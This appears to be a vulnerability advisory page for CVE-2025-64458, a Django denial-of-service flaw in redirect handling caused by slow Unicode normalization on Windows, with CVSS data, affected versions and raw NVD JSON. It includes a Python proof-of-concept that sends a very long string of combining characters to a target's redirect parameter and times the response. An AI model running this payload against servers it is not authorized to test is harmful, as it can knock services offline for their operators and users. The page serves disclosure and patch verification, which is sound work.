Security Vulnerability Report
CVE-2025-64458 CVSS 7.5 HIGH

CVE-2025-64458

Published: 2025-11-05 15:15:41
Last Modified: 2025-11-10 18:33:03
Source: 6a34fbeb-21d4-45e7-8e0a-62b95bc12c92

Description

An issue was discovered in 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8. NFKC normalization in Python is slow on Windows. As a consequence, `django.http.HttpResponseRedirect`, `django.http.HttpResponsePermanentRedirect`, and the shortcut `django.shortcuts.redirect` were subject to a potential denial-of-service attack via certain inputs with a very large number of Unicode characters. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* (4.2 <= version < 4.2.26) - VULNERABLE
cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* (5.1 <= version < 5.1.14) - VULNERABLE
cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* (5.2 <= version < 5.2.8) - VULNERABLE
Django 5.1.x < 5.1.14
Django 4.2.x < 4.2.26
Django 5.2.x < 5.2.8
Django 5.0.x (possibly affected, not evaluated)
Django 4.1.x (possibly affected, not evaluated)
Django 3.2.x (possibly affected, not evaluated)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import time

# CVE-2025-64458 PoC - Django Unicode DoS
# Target: Django server with vulnerable redirect function
# Note: per the advisory, the slow NFKC normalization is specific to Python on
# Windows, so a fast response from a non-Windows host does not prove it is patched.


def generate_unicode_payload(num_chars=10000):
    """Generate payload with large number of Unicode characters"""
    # Combining diacritical marks that trigger slow NFKC normalization
    payload = 'A' + ('\u0300' * num_chars)
    return payload


def test_vulnerability(target_url):
    """Test if target is vulnerable to CVE-2025-64458"""
    payload = generate_unicode_payload(50000)
    # Test redirect endpoint
    test_url = f"{target_url}/redirect?next={payload}"
    start_time = time.time()
    try:
        response = requests.get(test_url, timeout=30, allow_redirects=False)
        elapsed = time.time() - start_time
        print(f"[*] Request completed in {elapsed:.2f} seconds")
        print(f"[*] Status code: {response.status_code}")
        if elapsed > 10:
            print("[!] Target appears VULNERABLE - response time is very slow")
            return True
        else:
            print("[*] Target may not be vulnerable or patched")
            return False
    except requests.exceptions.Timeout:
        print("[!] Request timed out - target is likely VULNERABLE")
        return True
    except Exception as e:
        print(f"[!] Error: {e}")
        return False


if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://target-server.com"
    test_vulnerability(target)

References

https://docs.djangoproject.com/en/dev/releases/security/ (Vendor Advisory)
https://groups.google.com/g/django-announce (Mailing List)
https://www.djangoproject.com/weblog/2025/nov/05/security-releases/ (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64458", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2025-11-05T15:15:40.940", "lastModified": "2025-11-10T18:33:02.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8.\nNFKC normalization in Python is slow on Windows. As a consequence, `django.http.HttpResponseRedirect`, `django.http.HttpResponsePermanentRedirect`, and the shortcut `django.shortcuts.redirect` were subject to a potential denial-of-service attack via certain inputs with a very large number of Unicode characters.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Seokchan Yoon for reporting this issue."}, {"lang": "es", "value": "Se descubrió un problema en 5.1 anterior a 5.1.14, 4.2 anterior a 4.2.26 y 5.2 anterior a 5.2.8. La normalización NFKC en Python es lenta en Windows. Como consecuencia, 'django.http.HttpResponseRedirect', 'django.http.HttpResponsePermanentRedirect' y el atajo 'django.shortcuts.redirect' estuvieron sujetos a un potencial ataque de denegación de servicio a través de ciertas entradas con un número muy grande de caracteres Unicode. Series de Django anteriores y no compatibles (como 5.0.x, 4.1.x y 3.2.x) no fueron evaluadas y también pueden estar afectadas. 
Django desea agradecer a Seokchan Yoon por informar este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.2.26", "matchCriteriaId": "5FC7EBE0-A60A-4083-9FB7-E4ADCD2B5F37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1", "versionEndExcluding": "5.1.14", "matchCriteriaId": "9F3A5471-02DB-428E-815E-516057A901FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.8", "matchCriteriaId": "F56E9016-F93A-4DAE-8070-D3A4909F00A4"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Mailing List"]}, {"url": "https://www.djangoproject.com/weblog/2025/nov/05/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}]}}